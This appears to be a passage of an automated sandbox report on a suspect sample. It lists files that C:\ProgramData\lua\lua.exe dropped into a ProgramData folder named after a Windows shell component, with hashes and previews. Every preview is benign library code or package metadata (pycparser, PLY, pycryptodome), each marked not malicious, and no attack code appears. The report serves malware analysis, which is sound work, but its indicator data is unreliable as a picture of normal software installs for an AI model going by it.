SHA-256:	030CCDC84FEB3852B68332B4279A42583A9F93B57C28BE782131517FD9B81A56
SHA-512:	9C9D9BC3A6ACF6E7C864C3935CF93486986C022E838DA2DBCB0854ED4F4197548AD3A87EDC086F8457C50089B9C0739B94EBF4C663567A50155FE2FE2B0A239D
Malicious:	false
Preview:	#------------------------------------------------------------------------------.# pycparser: c_generator.py.#.# C code generator from pycparser AST nodes..#.# Eli Bendersky [https://eli.thegreenplace.net/].# License: BSD.#------------------------------------------------------------------------------.from . import c_ast...class CGenerator(object):. """ Uses the same visitor pattern as c_ast.NodeVisitor, but modified to. return a value from each visit method, using string accumulation in. generic_visit.. """. def __init__(self):. # Statements start with indentation of self.indent_level spaces, using. # the _make_indent method. #. self.indent_level = 0.. def _make_indent(self):. return ' ' * self.indent_level.. def visit(self, node):. method = 'visit_' + node.__class__.__name__. return getattr(self, method, self.generic_visit)(node).. def generic_visit(self, node):. #~ print('generic:', type(node)).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser\c_lexer.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	16208
Entropy (8bit):	4.8926962327167045
Encrypted:	false
SSDEEP:	384:Wirug/TkGlgM8NsZDcX1WRWc2kSsnfQn+vwC26OilEH:1rx7Tlg5V1oWNkjfQnIX6H
MD5:	970924ECF56E2F5455D0DDE70F451857
SHA1:	1236EA40C52BEA71B32FA993ECB082D0380E06C4
SHA-256:	1963D493015EE85D3481300A20F031E31B3CF89F9AB7FA06C041E7ACA178B5E3
SHA-512:	F829C3788E25DFF7376BD41A6A54B3413545167097F923FE7DE18715E15B5E86A91F91B5779BFDC7B4ACA93C6F08F48BBD60605436105A9DE74D0FA0FF6445DE
Malicious:	false
Preview:	#------------------------------------------------------------------------------.# pycparser: c_lexer.py.#.# CLexer class: lexer for the C language.#.# Eli Bendersky [https://eli.thegreenplace.net/].# License: BSD.#------------------------------------------------------------------------------.import re.import sys..from .ply import lex.from .ply.lex import TOKEN...class CLexer(object):. """ A lexer for the C language. After building it, set the. input text with input(), and call token() to get new. tokens... The public attribute filename can be set to an initial. filename, but the lexer will update it upon #line. directives.. """. def __init__(self, error_func, on_lbrace_func, on_rbrace_func,. type_lookup_func):. """ Create a new Lexer... error_func:. An error function. Will be called with an error. message, line and column as arguments, in case of. an error during l

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser\c_parser.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	69746
Entropy (8bit):	4.387453186664436
Encrypted:	false
SSDEEP:	768:uNJUOkuQyIHUXDwXdn0SPWCHehBGnedRbWIwAhAwYhP:+JUkI0K0S+CHehBl2w+
MD5:	75651729F741B2225C843749D34C1877
SHA1:	9E38E5320A5B2170BFA909ACD927C5F87EEE40CD
SHA-256:	C3BE0DE2D1464374C44C8A94C0295921C6E5F95E2115E2523C6DA16A5560515B
SHA-512:	7E994244C09ACC855E94EB6988ACAFFC09F578EE9B582B22421088C3962EFFE42DA6458FB3E5930AA7E96A97BCF6DB58BEB9AC56D74ECFF60CBBA8FFAF45ECD5
Malicious:	false
Preview:	#------------------------------------------------------------------------------.# pycparser: c_parser.py.#.# CParser class: Parser and AST builder for the C language.#.# Eli Bendersky [https://eli.thegreenplace.net/].# License: BSD.#------------------------------------------------------------------------------.import re..from .ply import yacc..from . import c_ast.from .c_lexer import CLexer.from .plyparser import PLYParser, Coord, ParseError, parameterized, template.from .ast_transforms import fix_switch_cases...@template.class CParser(PLYParser):. def __init__(. self,. lex_optimize=True,. lexer=CLexer,. lextab='pycparser.lextab',. yacc_optimize=True,. yacctab='pycparser.yacctab',. yacc_debug=False,. taboutputdir=''):. """ Create a new CParser... Some arguments for controlling the debug/optimization. level of the parser are provided. The defaults are. tuned

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser\lextab.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7011
Entropy (8bit):	5.467654056707674
Encrypted:	false
SSDEEP:	192:CUxT3+PPxgckr4wxhIF8FfV77Wov9IyRPT4f:CUxT3+3xgcQhIF8FfVPWoFIyyf
MD5:	54A2EF8F49B614697283D814F18FACA8
SHA1:	C16F895C62996D6C32AC82DD8075547BA96776D7
SHA-256:	1728D122C6AADB05620EA24D61271446E73B1835B9175D95B98C4E24B8758F88
SHA-512:	DF56CFB4178B0FDB4692CF955DDDEE48341C5D0A00AB99A1EE5A024C04DF703F70EFBE9F780AAF049CFF21939B5B1343C9EF00FEDC4E045281C15DA8365785A3
Malicious:	false
Preview:	# lextab.py. This file automatically created by PLY (version 3.10). Don't edit!._tabversion = '3.10'._lextokens = set(('VOID', 'LBRACKET', 'WCHAR_CONST', 'FLOAT_CONST', 'MINUS', 'RPAREN', 'LONG', 'PLUS', 'ELLIPSIS', 'GT', 'GOTO', 'ENUM', 'PERIOD', 'GE', 'INT_CONST_DEC', 'ARROW', '__INT128', 'HEX_FLOAT_CONST', 'DOUBLE', 'MINUSEQUAL', 'INT_CONST_OCT', 'TIMESEQUAL', 'OR', 'SHORT', 'RETURN', 'RSHIFTEQUAL', 'RESTRICT', 'STATIC', 'SIZEOF', 'UNSIGNED', 'UNION', 'COLON', 'WSTRING_LITERAL', 'DIVIDE', 'FOR', 'PLUSPLUS', 'EQUALS', 'ELSE', 'INLINE', 'EQ', 'AND', 'TYPEID', 'LBRACE', 'PPHASH', 'INT', 'SIGNED', 'CONTINUE', 'NOT', 'OREQUAL', 'MOD', 'RSHIFT', 'DEFAULT', 'CHAR', 'WHILE', 'DIVEQUAL', 'EXTERN', 'CASE', 'LAND', 'REGISTER', 'MODEQUAL', 'NE', 'SWITCH', 'INT_CONST_HEX', '_COMPLEX', 'PPPRAGMASTR', 'PLUSEQUAL', 'STRUCT', 'CONDOP', 'BREAK', 'VOLATILE', 'PPPRAGMA', 'ANDEQUAL', 'INT_CONST_BIN', 'DO', 'LNOT', 'CONST', 'LOR', 'CHAR_CONST', 'LSHIFT', 'RBRACE', '_BOOL', 'LE', 'SEMI', 'LT', 'COMMA

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser\ply\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	102
Entropy (8bit):	4.939247220388048
Encrypted:	false
SSDEEP:	3:SQ3rWAFJOClBPAvvKXLvbLzi6+Fo+CRGp:S8WSJcsvzi6+h
MD5:	498B675AAD8DC005DC64DB594F221378
SHA1:	0175637D9E29875517C7C8F50C3A17CD5573A9BC
SHA-256:	AB8B3CE90C11B1845ADB42FDB9E4B17E1FA13E28697ED0630CEBD86B6FD24B66
SHA-512:	08F6534F23743661D9BAF4FCC74EF1C1CC50B476A03F309DD1576395C186685532A32CEA24793BBC6B81795F602EFF3DFF00F867608ECAB7A05FBF4A82D45530
Malicious:	false
Preview:	# PLY package.# Author: David Beazley (dave@dabeaz.com)..__version__ = '3.9'.__all__ = ['lex','yacc'].

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser\ply\cpp.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	33282
Entropy (8bit):	4.1589112496295275
Encrypted:	false
SSDEEP:	384:OAO63iy1Q/DWJlH+a3rTYpfLvwizREiNgD22zyMXZ5cwQrirgGVyuNib:OAG/y9nIBzyiNb7cub
MD5:	5731A2F2A7AB75460BA671074C280EF2
SHA1:	CFBEA64F58966B1CEA2D12F562042AA338E49D0A
SHA-256:	52D0B7CA54D6A79FF530A03E3CB0AEC0A411F3348E9E51AE18621DCE3F314BDF
SHA-512:	715685065ACB1814CA639D52DA16398A051B1A1B200F75F842996AF1C79A3C5E46E96BD1CA1BC391A53ABC9E764B8744F099CBEC2F777FA67B09B4CC378AF98E
Malicious:	false
Preview:	# -----------------------------------------------------------------------------.# cpp.py.#.# Author: David Beazley (http://www.dabeaz.com).# Copyright (C) 2017.# All rights reserved.#.# This module implements an ANSI-C style lexical preprocessor for PLY..# -----------------------------------------------------------------------------.import sys..# Some Python 3 compatibility shims.if sys.version_info.major < 3:. STRING_TYPES = (str, unicode).else:. STRING_TYPES = str. xrange = range..# -----------------------------------------------------------------------------.# Default preprocessor lexer definitions. These tokens are enough to get.# a basic preprocessor working. Other modules may import these if they want.# -----------------------------------------------------------------------------..tokens = (. 'CPP_ID','CPP_INTEGER', 'CPP_FLOAT', 'CPP_STRING', 'CPP_CHAR', 'CPP_WS', 'CPP_COMMENT1', 'CPP_COMMENT2', 'CPP_POUND','CPP_DPOUND'.)..literals = "+-*/%\|&~^<>=!?()[]{}.,;:\\\'\

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser\ply\ctokens.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3177
Entropy (8bit):	4.8189809262365415
Encrypted:	false
SSDEEP:	48:MopW8UdBS4YZX94VdnfSuu8imYIOmbMJ2SmkXe6Lype7e3TZdsg:MLDdk4kWu8ilIORakhyoq3TPsg
MD5:	3243640DA7B709C2065957B20BB7F0A6
SHA1:	16C5DDB58D86981D913FFC76B2EDE9F607B79670
SHA-256:	30A92C9CDE344DE84F86055FC422618E3FC18CBF78DDAA6B78004A633F9B9746
SHA-512:	1D97B0D84AE4EF059A4342C8E40C9DC3723DBD5E40ABADCEA06194EAA1B816097659B77593C49591AE377D68C498CA0ECD563B618A07D9E6A7F70EBF8CC3B90E
Malicious:	false
Preview:	# ----------------------------------------------------------------------.# ctokens.py.#.# Token specifications for symbols in ANSI C and C++. This file is.# meant to be used as a library in other tokenizers..# ----------------------------------------------------------------------..# Reserved words..tokens = [. # Literals (identifier, integer constant, float constant, string constant, char const). 'ID', 'TYPEID', 'INTEGER', 'FLOAT', 'STRING', 'CHARACTER',.. # Operators (+,-,,/,%,\|,&,~,^,<<,>>, \|\|, &&, !, <, <=, >, >=, ==, !=). 'PLUS', 'MINUS', 'TIMES', 'DIVIDE', 'MODULO',. 'OR', 'AND', 'NOT', 'XOR', 'LSHIFT', 'RSHIFT',. 'LOR', 'LAND', 'LNOT',. 'LT', 'LE', 'GT', 'GE', 'EQ', 'NE',. . # Assignment (=, =, /=, %=, +=, -=, <<=, >>=, &=, ^=, \|=). 'EQUALS', 'TIMESEQUAL', 'DIVEQUAL', 'MODEQUAL', 'PLUSEQUAL', 'MINUSEQUAL',. 'LSHIFTEQUAL','RSHIFTEQUAL', 'ANDEQUAL', 'XOREQUAL', 'OREQUAL',.. # Increment/decrement (++,--). 'INCREMENT', 'DECREMENT',.. # Str

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser\ply\lex.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	42918
Entropy (8bit):	4.356827020656561
Encrypted:	false
SSDEEP:	768:LjqVpMmn7baUfzt98CXy1QhCPZWT7ZDtimJML0fD:yVpMQbaUfzt98/ZCDYm+sD
MD5:	44F8CF25BFAA701DF3133557D80B9965
SHA1:	A5525223098295B03AEF684BFA10D6B977723824
SHA-256:	ED0A25E7BC7BD361D9C2303764BA7EF38094116AB511E856F8DEBB5B38218BE3
SHA-512:	1F5B4875079B4F99911B001AFBAB98DF0C0FAAB975B5E49A25AF915430160D9BFC61399368243378A77DD36E6140E1BE406D49CB1952BD5E3970300A364863C3
Malicious:	false
Preview:	# -----------------------------------------------------------------------------.# ply: lex.py.#.# Copyright (C) 2001-2017.# David M. Beazley (Dabeaz LLC).# All rights reserved..#.# Redistribution and use in source and binary forms, with or without.# modification, are permitted provided that the following conditions are.# met:.#.# * Redistributions of source code must retain the above copyright notice,.# this list of conditions and the following disclaimer..# * Redistributions in binary form must reproduce the above copyright notice,.# this list of conditions and the following disclaimer in the documentation.# and/or other materials provided with the distribution..# * Neither the name of the David Beazley or Dabeaz LLC may be used to.# endorse or promote products derived from this software without.# specific prior written permission..#.# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.# LIMI

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser\ply\yacc.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	137323
Entropy (8bit):	4.1261716972447315
Encrypted:	false
SSDEEP:	1536:nGOL4pGza1ctxgZv4AzSvgASWvgsieKuY2P98iZWxbnYgwNf:FLNzaeAZv4AzSvgASWvgsieKdDnYggf
MD5:	44D1BD9C28DDD0822FE9F1D2593DFB68
SHA1:	EC6AF0EF38FCC417632C5515340C7529FB6B9EB8
SHA-256:	79AB520E444B811AFA5F7FA1A0393F49042FD3AE51D0174BD8AEDF439E028153
SHA-512:	2122838B5FD74D38B9ECD1BE2BA3764A964CAA4BB09D1EA3006641E736F32C1585D8AF64A60A8F4CB702C8883A045E62BA02C1D5F236FDC2D26CC69504046570
Malicious:	false
Preview:	# -----------------------------------------------------------------------------.# ply: yacc.py.#.# Copyright (C) 2001-2017.# David M. Beazley (Dabeaz LLC).# All rights reserved..#.# Redistribution and use in source and binary forms, with or without.# modification, are permitted provided that the following conditions are.# met:.#.# * Redistributions of source code must retain the above copyright notice,.# this list of conditions and the following disclaimer..# * Redistributions in binary form must reproduce the above copyright notice,.# this list of conditions and the following disclaimer in the documentation.# and/or other materials provided with the distribution..# * Neither the name of the David Beazley or Dabeaz LLC may be used to.# endorse or promote products derived from this software without.# specific prior written permission..#.# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.# LIM

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser\ply\ygen.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	4.621972194451417
Encrypted:	false
SSDEEP:	48:55/9Ob1pREFh+BkJsyL5Cr/WSPU52hPhk1oJ3zjD5al:wpREFh+Bjy18/roaUoJ92
MD5:	06E1EBA623A13ABA4D44D4D3E5A85AEE
SHA1:	730CCB11658837A396C0F999E8209FBAEBB594E7
SHA-256:	D8960D798B6B3F3D49CCB48B3B77781AC4BCCC953C8D8FC8FC2475548F605AB0
SHA-512:	B8F3A2369BE24A18B6B8EB5190AD78370BF3325955A510066DE55BB1B1B66077B3F1FFA28C1CEF5B2F60DEFCBB1944DA5B8C4EAF78BC36F91D513819A72F4D45
Malicious:	false
Preview:	# ply: ygen.py.#.# This is a support program that auto-generates different versions of the YACC parsing.# function with different features removed for the purposes of performance..#.# Users should edit the method LParser.parsedebug() in yacc.py. The source code .# for that method is then used to create the other methods. See the comments in.# yacc.py for further details...import os.path.import shutil..def get_source_range(lines, tag):. srclines = enumerate(lines). start_tag = '#--! %s-start' % tag. end_tag = '#--! %s-end' % tag.. for start_index, line in srclines:. if line.strip().startswith(start_tag):. break.. for end_index, line in srclines:. if line.strip().endswith(end_tag):. break.. return (start_index + 1, end_index)..def filter_section(lines, tag):. filtered_lines = []. include = True. tag_text = '#--! %s' % tag. for line in lines:. if line.strip().startswith(tag_text):. include = not includ

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser\plyparser.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4873
Entropy (8bit):	4.49639916275709
Encrypted:	false
SSDEEP:	96:L2AygmJY4pkPJVLv4dW24o9RlyFLui/Buk5R8E:LPzJl4I24orlyFLnEkL8E
MD5:	A0B69BBC193F4DDD9DE977D8A7A505C8
SHA1:	215228F72342FFCE15B2BB92591FC36C21BD7B66
SHA-256:	B1A18D8E9B209DC433FA11C4878E5FDBC04BAA8A53C477DF68983FF41099862F
SHA-512:	120FAA312CB51D932B5DC0F4C0EDD4C09DBA9F2AC3FE19139988BCA28DA8E6BF14018AA66021E536C8CE50769939FC5D526720FA902DAC433B02D0C80B2B4F4C
Malicious:	false
Preview:	#-----------------------------------------------------------------.# plyparser.py.#.# PLYParser class and other utilites for simplifying programming.# parsers with PLY.#.# Eli Bendersky [https://eli.thegreenplace.net/].# License: BSD.#-----------------------------------------------------------------..import warnings..class Coord(object):. """ Coordinates of a syntactic element. Consists of:. - File name. - Line number. - (optional) column number, for the Lexer. """. __slots__ = ('file', 'line', 'column', '__weakref__'). def __init__(self, file, line, column=None):. self.file = file. self.line = line. self.column = column.. def __str__(self):. str = "%s:%s" % (self.file, self.line). if self.column: str += ":%s" % self.column. return str...class ParseError(Exception): pass...class PLYParser(object):. def _create_opt_rule(self, rulename):. """ Given a rule name, creates an optional ply.yacc

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycparser\yacctab.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	169715
Entropy (8bit):	4.767518617478814
Encrypted:	false
SSDEEP:	1536:wBFk6OShxoYyDTnhyFCQ1PyNCkiGzYYBdzBJy0HMMZFHcB2es67Sx1gc4EeL01xj:baWFJ
MD5:	4DC6DF3AF8AD1DFFE213A18AC6E2B928
SHA1:	0E87610DD5C98D1619D6F2E933A90895D2E1CC88
SHA-256:	28E7B0B073606D261A62B2EF0C9AFB2B78D78FEEEAA2ED278323449E10E6C81E
SHA-512:	F5C362760C099E128E3126B31DBDD9BEA70C9243E127D0ED2D8C7EA89792A91152C4693B2BA59F076577B9F49D71D84D05736CE76A4F6E91BFD8482D3B7676A3
Malicious:	false
Preview:	.# yacctab.py.# This file is automatically generated. Do not edit.._tabversion = '3.10'.._lr_method = 'LALR'.._lr_signature = 'translation_unit_or_emptyleftLORleftLANDleftORleftXORleftANDleftEQNEleftGTGELTLEleftRSHIFTLSHIFTleftPLUSMINUSleftTIMESDIVIDEMOD_BOOL _COMPLEX AUTO BREAK CASE CHAR CONST CONTINUE DEFAULT DO DOUBLE ELSE ENUM EXTERN FLOAT FOR GOTO IF INLINE INT LONG REGISTER OFFSETOF RESTRICT RETURN SHORT SIGNED SIZEOF STATIC STRUCT SWITCH TYPEDEF UNION UNSIGNED VOID VOLATILE WHILE __INT128 ID TYPEID INT_CONST_DEC INT_CONST_OCT INT_CONST_HEX INT_CONST_BIN FLOAT_CONST HEX_FLOAT_CONST CHAR_CONST WCHAR_CONST STRING_LITERAL WSTRING_LITERAL PLUS MINUS TIMES DIVIDE MOD OR AND NOT XOR LSHIFT RSHIFT LOR LAND LNOT LT LE GT GE EQ NE EQUALS TIMESEQUAL DIVEQUAL MODEQUAL PLUSEQUAL MINUSEQUAL LSHIFTEQUAL RSHIFTEQUAL ANDEQUAL XOREQUAL OREQUAL PLUSPLUS MINUSMINUS ARROW CONDOP LPAREN RPAREN LBRACKET RBRACKET LBRACE RBRACE COMMA PERIOD SEMI COLON ELLIPSIS PPHASH PPPRAGMA PPPRAGMASTRabstract_declara

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycryptodome-3.9.9.dist-info\AUTHORS.rst Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	735
Entropy (8bit):	4.843163654017738
Encrypted:	false
SSDEEP:	12:7tVsnVe0u8P5K1CPpRIP5WsFTrPiXpbuvIy2e83mjEQcUcZVeAolHJeZpeoxRp3p:7zs9h4yWkcTraXpbul9t6fOHwZYCRboo
MD5:	71E5C6CBBFD795B9E3AB9B0B916AE2FE
SHA1:	0844FAED18625534F7196CB603AA4F12B61E0997
SHA-256:	E00791BCC3E1412AB065C5DA89C5F752FE8CCF253DF2037150D710B04E9788D8
SHA-512:	4BCC5E115BB2A35554959C06DBE3503C83D0385FF1C87601E733EEF60DCCB86A205FF989A5FDFB93015134FB6EE6D81ECF7082F670EF51EAD7896AF0AA470B8A
Malicious:	false
Preview:	Simon Arneaud.Nevins Bartolomeo.Thorsten E. Behrens.Tim Berners-Lee.Fr.d.ric Bertolus.Ian Bicking.Joris Bontje.Antoon Bosselaers.Andrea Bottoni.Jean-Paul Calderone.Sergey Chernov.Geremy Condra.Jan Dittberner.Andrew Eland.Philippe Frycia.Peter Gutmann.Hirendra Hindocha.Nikhil Jhingan.Sebastian Kayser.Ryan Kelly.Andrew M. Kuchling.Piers Lauder.Legrandin.M.-A. Lemburg.Wim Lewis.Darsey C. Litzenberger.Richard Mitchell.Mark Moraes.Lim Chee Siang.Bryan Olson.Wallace Owen.Colin Plumb.Robey Pointer.Lorenz Quack.Sebastian Ramacher.Jeethu Rao.James P. Rutledge.Matt Schreiner.Peter Simmons.Janne Snabb.Tom St. Denis.Anders Sundman.Paul Swartz.Fabrizio Tarizzo.Kevin M. Turner.Barry A. Warsaw.Eric Young.Hannes van Niekerk.Stefan Seering.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycryptodome-3.9.9.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycryptodome-3.9.9.dist-info\LICENSE.rst Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	14685
Entropy (8bit):	4.691291216057003
Encrypted:	false
SSDEEP:	384:BGxTkpRtGFMbc9vlKM1zJlFvmNz5VrlkTS07Ht:BEYGFMY9TzJlFvAfxk1rt
MD5:	6DC0E2A13D2F25D6F123C434B761FABA
SHA1:	9D06D2F12955E69E3C7E9F53538ABD61E9354AC9
SHA-256:	D1AF3FAB2EF8CC53B6C7F48BDEB178AC874B04FAF4BA0159A96B6109F1D393E2
SHA-512:	1D5564DF8087C6BC11C30BC38714290698A9B9B4194D28810831847C3E40EA47701EECA42665085C2C75BCB31D704446017762FA24744901135621B5B4F38BE1
Malicious:	false
Preview:	The source code in PyCryptodome is partially in the public domain.and partially released under the BSD 2-Clause license...In either case, there are minimal if no restrictions on the redistribution,.modification and usage of the software...Public domain.=============..All code originating from PyCrypto is free and unencumbered software.released into the public domain...Anyone is free to copy, modify, publish, use, compile, sell, or.distribute this software, either in source code form or as a compiled.binary, for any purpose, commercial or non-commercial, and by any.means...In jurisdictions that recognize copyright laws, the author or authors.of this software dedicate any and all copyright interest in the.software to the public domain. We make this dedication for the benefit.of the public at large and to the detriment of our heirs and.successors. We intend this dedication to be an overt act of.relinquishment in perpetuity of all present and future rights to this.software under copyright

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycryptodome-3.9.9.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3189
Entropy (8bit):	5.067538053240341
Encrypted:	false
SSDEEP:	96:D4o+oQI4QIRvQIFjjaaYxmPXFnr9SfeN0Llog1438:qPw5CNNbgGs
MD5:	9D8A161680ADA9D4C42BB93BB88DB6D5
SHA1:	57A78E88FA276CAE589278A2F332EDC1BA241B61
SHA-256:	475D30780B72F4D3F7E11FFFB3506CDBFF3C823C0DDC41B0989884E9D85CD4F3
SHA-512:	4D94DE095BB0E9936A029C4263D60281B5784B0AEA23AC06DF71278272642EEC14100E5604A58E22DF5383F42C9BA83260A9D3573E48FAB3EE4E3EBFDFA37CAF
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: pycryptodome.Version: 3.9.9.Summary: Cryptographic library for Python.Home-page: https://www.pycryptodome.org.Author: Helder Eijs.Author-email: helderijs@gmail.com.License: BSD, Public Domain, Apache.Project-URL: Source, https://github.com/Legrandin/pycryptodome/.Platform: Posix; MacOS X; Windows.Classifier: Development Status :: 5 - Production/Stable.Classifier: License :: OSI Approved :: BSD License.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: Public Domain.Classifier: Intended Audience :: Developers.Classifier: Operating System :: Unix.Classifier: Operating System :: Microsoft :: Windows.Classifier: Operating System :: MacOS :: MacOS X.Classifier: Topic :: Security :: Cryptography.Classifier: Programming Language :: Python :: 2.Classifier: Programming Language :: Python :: 2.6.Classifier: Programming Language :: Python :: 2.7.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycryptodome-3.9.9.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	95255
Entropy (8bit):	5.78500867964881
Encrypted:	false
SSDEEP:	1536:EjRkRMtV4dl/Xk2gsNicV8FJQKDg4lqna4:EjRkkVi/Niq8FJQKy3
MD5:	AEF88AE3B209C705E8603C52DD87F4DE
SHA1:	FE65927D4DC8C1809A659C412DEFFBA4CFEA5833
SHA-256:	8E1B5F42FB568DFAB0868E33193057508C44551D66024B908DB0729AA0A775AE
SHA-512:	9C2B583851B46CF0473B0741E62B2917EE96DF0D011DC297D365E42706E0C61B0BDDD37105730C452AB1487B8232101D69C6879E1E16C78FC004E6CD9930BC18
Malicious:	false
Preview:	Crypto/Cipher/AES.py,sha256=MOnR9u7vBisJfNzx198qVSaNbhylinQzyLYae76Rwi8,9541..Crypto/Cipher/AES.pyi,sha256=KFRI5Bc7OMN7APFJ48wrcH0sQISsFfiY91HtLNpJqgA,1343..Crypto/Cipher/ARC2.py,sha256=L2-Nj1XT8zBjZUTykGq8N0QONXfuiNLJNQJZzSztI_M,7010..Crypto/Cipher/ARC2.pyi,sha256=FrGIcMtmPnJ08OoLnYhCJCYx0RxYvSgHimNKeTkn0qQ,954..Crypto/Cipher/ARC4.py,sha256=MjMVoqqU232XJsU_sZlPrCAjUMpGGAT3fDS8PpC-XZ8,5152..Crypto/Cipher/ARC4.pyi,sha256=sMw73yZHeonmGx9BhiyA7__4PQJocU04SMRcDjnyJ2Y,431..Crypto/Cipher/Blowfish.py,sha256=UbpLnRlNWaclr9cjZuvgJoPXrTI9fYJThqG2X5NIFH4,5964..Crypto/Cipher/Blowfish.pyi,sha256=C7lgc7tn4IqV_7jwP-QGUTTgGsik6ZPY4cBH8q7LSII,990..Crypto/Cipher/CAST.py,sha256=DIoa9CsmGqI-h1h4U3tBF3PzYFVdWbfHqTi_TeWEVck,6071..Crypto/Cipher/CAST.pyi,sha256=S_Z4-goG9AWDj6QwE3pjPLJKpHbQ2ssq98vIAWTOqVU,955..Crypto/Cipher/ChaCha20.py,sha256=jaopj8g8uwBT_j1of3Fq2A8E9-Ht9NWl7grqrAvhs74,10734..Crypto/Cipher/ChaCha20.pyi,sha256=_l1xhtOyBmYEHP7Ftmk8EQZpKegX9p3N5tckC_PPve0,762..Crypto/Cipher/ChaCha20_Poly1305.py,s

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycryptodome-3.9.9.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	102
Entropy (8bit):	5.045097529036378
Encrypted:	false
SSDEEP:	3:RtED7MWcSlVilv6gP+tkSrLcyn:RtEMwlVilv6gWKSrLcyn
MD5:	450D9B4C9318D561EBF9DD24C23E8BE0
SHA1:	07648F2D1F33CFEAF6F9681F76C5B498FC7EA6B7
SHA-256:	4982880A2C3B10FAE9C8E78222E009B305D36405976C9047BC061CA6E5295F53
SHA-512:	7C63ECE85118249B1B153772EB710D86D5ABA09D1DAAFC7AE412A737E12FD9CA31D53EF55E508CA4BFA29467E970670E25A7E36B11DF81E8B25EA83C6DECEA0C
Malicious:	false
Preview:	Wheel-Version: 1.0..Generator: bdist_wheel (0.35.1)..Root-Is-Purelib: false..Tag: cp37-cp37m-win32....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\pycryptodome-3.9.9.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7
Entropy (8bit):	2.8073549220576046
Encrypted:	false
SSDEEP:	3:ZVRKv:ZOv
MD5:	99DF66E59FEE87240E7126A32D7F8160
SHA1:	FCF7EA87204EA629ADCB68C3CCF592C0EB81A700
SHA-256:	F96DB04ED9317354273D43D1A816746CCC2B843F31443D771C8A1B157FB00CEB
SHA-512:	AC9195C053CDE2F5B5F87C8E10790E16F71124DDFDCB8D2C3C163DFC49FADFABFA57DA5936C12454B52BBFFB1CE225DB472E8EE2A877340DA3091419825D18D6
Malicious:	false
Preview:	Crypto.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\python_engineio-3.13.2.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

